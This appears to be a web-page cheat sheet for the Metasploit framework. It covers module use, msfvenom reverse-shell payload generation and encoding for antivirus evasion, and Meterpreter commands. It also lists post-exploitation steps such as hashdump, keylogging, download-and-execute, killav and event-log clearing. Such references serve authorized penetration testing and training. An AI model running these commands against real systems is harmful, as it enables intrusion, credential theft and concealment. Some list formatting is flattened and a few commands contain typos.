Metasploit cheat sheet
Basic Metasploit Commands
Search for a Module
msf > search [regex]
Specify an Exploit
msf > use exploit/[ExploitPath]
Set a Payload
msf > set PAYLOAD [PayloadPath]
Show Options for Current Modules
msf > show options
Set Options
msf > set [Option] [Value]
Start Exploit
msf > exploit
Useful Auxiliary Modules
- Port Scanner
msf > use auxiliary/scanner/portscan/tcp msf > set RHOSTS 10.10.10.0/24 msf > run
- DNS Enumeration
msf > use auxiliary/gather/dns_enum msf > set DOMAIN target.tgt msf > run
- FTP Server
msf > use auxiliary/server/ftp msf > set FTPROOT /tmp/ftproot msf > run
- Proxy Server
msf > use auxiliary/server/socks4 msf > run
Msfvenom Tool
- Generate Payloads
$ msfvenom –p [PayloadPath] –f [FormatType] LHOST=[LocalHost] LPORT=[LocalPort]
Example:
$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=10.1.1.1 LPORT=4444 > met.exe
- Format Options
exe
– Executablepl
– Perlrb
– Rubyraw
– Raw shellcodec
– C code
- Encoding Payloads
$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost] LPORT=[LocalPort]
Example:
$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=10.1.1.1 LPORT=4444 > mal.exe
Metasploit Meterpreter Commands
- Base Commands
? / help
: Display command summaryexit / quit
: Exit Meterpreter sessionsysinfo
: Show system name and OSshutdown / reboot
: Self-explanatory
- File System Commands
cd
,lcd
,pwd / getwd
,ls
,cat
download / upload
mkdir / rmdir
edit
- Process Commands
getpid
,getuid
,ps
,kill
,execute
,migrate
- Network Commands
ipconfig
,portfwd
,route
- Misc Commands
idletime
,uictl [enable/disable] [keyboard/mouse]
,screenshot
- Additional Modules
use [module]
- Example:
use priv
,hashdump
,timestomp
Managing Sessions
- Multiple Exploitation
- Single session, immediately backgrounded:
msf > exploit -z
- Multiple sessions, backgrounded:
msf > exploit –j
- Single session, immediately backgrounded:
- Session Management
- List jobs:
msf > jobs –l
- Kill a job:
msf > jobs –k [JobID]
- List sessions:
msf > sessions -l
- Interact with a session:
msf > session -i [SessionID]
- Background current session:
meterpreter > <Ctrl+Z>
ormeterpreter > background
- List jobs:
- Routing Through Sessions
msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]
Advanced Metasploit Usage
- Database Interaction
- db_connect: Connect to a database.
- db_disconnect: Disconnect from the current database.
- db_status: Display current database status.
- hosts: List all hosts in the database.
- services: List all services in the database.
- vulns: List all vulnerabilities in the database.
- Post Exploitation
- run post/windows/gather/checkvm: Check if the target is a virtual machine.
- run post/multi/recon/local_exploit_suggester: Suggest local exploits.
- run post/windows/manage/migrate: Migrate Meterpreter to another process.
- run getprivs: Attempt to enable all privileges available.
- run killav: Attempt to kill common antivirus products.
- Credential Gathering
- use auxiliary/scanner/smb/smb_login: SMB login utility.
- use auxiliary/scanner/ssh/ssh_login: SSH login utility.
- use auxiliary/scanner/http/http_login: HTTP login utility.
- run post/windows/gather/hashdump: Dump the SAM database.
- Pivoting
- autoroute: Automate route addition.
- socks4a: Setup a SOCKS4a proxy server.
- use auxiliary/server/socks4a: Start a SOCKS4a proxy server.
- Exploit Development
- irb: Drop into an interactive Ruby shell.
- edit: Edit a file or module.
- reload_all: Reload all modules.
- Using Exploits
- check: Check if the target is vulnerable to the selected exploit.
- setg / unsetg: Set/unset a global variable.
- show targets / payloads / advanced / evasion: Show targets, payloads, advanced options, or evasion techniques for the current exploit.
- Working with Modules
- use [module type]/[module name]: Load a specific module.
- back: Move back from the current context.
- info: Display information about one module.
- NOPS, Encoders, and Payloads
- generate: Generate a payload.
- encode: Encode a payload to evade antivirus detection.
- nop: Generate a series of NOP instructions.
- Resource Scripts
- resource [path/to/script]: Run commands from a resource script file.
- makerc [path/to/script]: Save the current Metasploit framework commands to a resource script.
- Console and Environment
- save: Save the active datastores.
- setg [variable] [value]: Set a global variable.
- unsetg [variable]: Unset a global variable.
- spool [file]: Write console output to a file.
- Listening and Handlers
- exploit -j -z: Run an exploit as a job in the background.
- set ExitOnSession false: Do not terminate the exploit after a session has been created (useful for multi-target exploits).
- sessions -K: Kill all active sessions.
- Working with Sessions
- sessions -i [id]: Interact with a specific session.
- sessions -u [id]: Upgrade a normal shell to a Meterpreter shell.
- sessions -k [id]: Kill a specific session.
Post Exploitation
Gather Credentials
use post/windows/gather/hashdump set SESSION [SessionID] run
Capture Keystrokes
use post/windows/capture/keylog_recorder set SESSION [SessionID] run
Download and Execute Payloads
use post/windows/manage/download_exec set SESSION [SessionID] set URL [PayloadURL] set EXE [ExecutableName] run
Clear Event Logs
use post/windows/manage/clear_event_logs set SESSION [SessionID] run
Pivoting
Setup a SOCKS Proxy
use auxiliary/server/socks_proxy set SRVHOST [LocalHost] set SRVPORT [LocalPort] run
Add Route for Pivoting
use post/multi/manage/autoroute set SESSION [SessionID] set SUBNET [TargetSubnet] set NETMASK [SubnetMask] run
Database Commands
- Connect to the Database
msf > db_connect [user]:[pass]@[host]:[port]/[database]
- Import Scan Results
msf > db_import [filename.xml]
- Export Data
msf > db_export -f [format] -a [filename]
Exploit Development
Check if a Module is Loaded
msf > use [module]; info
Reload All Modules
msf > reload_all
Check for Vulnerable Software
use auxiliary/scanner/http/version_scanner set RHOSTS [TargetIP] run
Advanced Usage
Use Meterpreter Script
run [script]
Execute System Commands Directly
execute -f [command] -i
Listening for Incoming Connections
use exploit/multi/handler set PAYLOAD [PayloadType] set LHOST [LocalHost] set LPORT [LocalPort] exploit
Using Plugins
- Load a plugin:
load [plugin]
- Unload a plugin:
unload [plugin]
- Load a plugin:
Miscellaneous
- Working with Workspaces
- Create:
workspace -a [name]
- Switch:
workspace [name]
- Delete:
workspace -d [name]
- Create:
- Using Resource Scripts
- Run a resource script:
resource [path/to/script.rc]
- Run a resource script:
- Generating Reports
- Generate a report:
db_export -f [format] [filename]
- Generate a report:
Last updated 26 Apr 2024, 15:18 +0530 .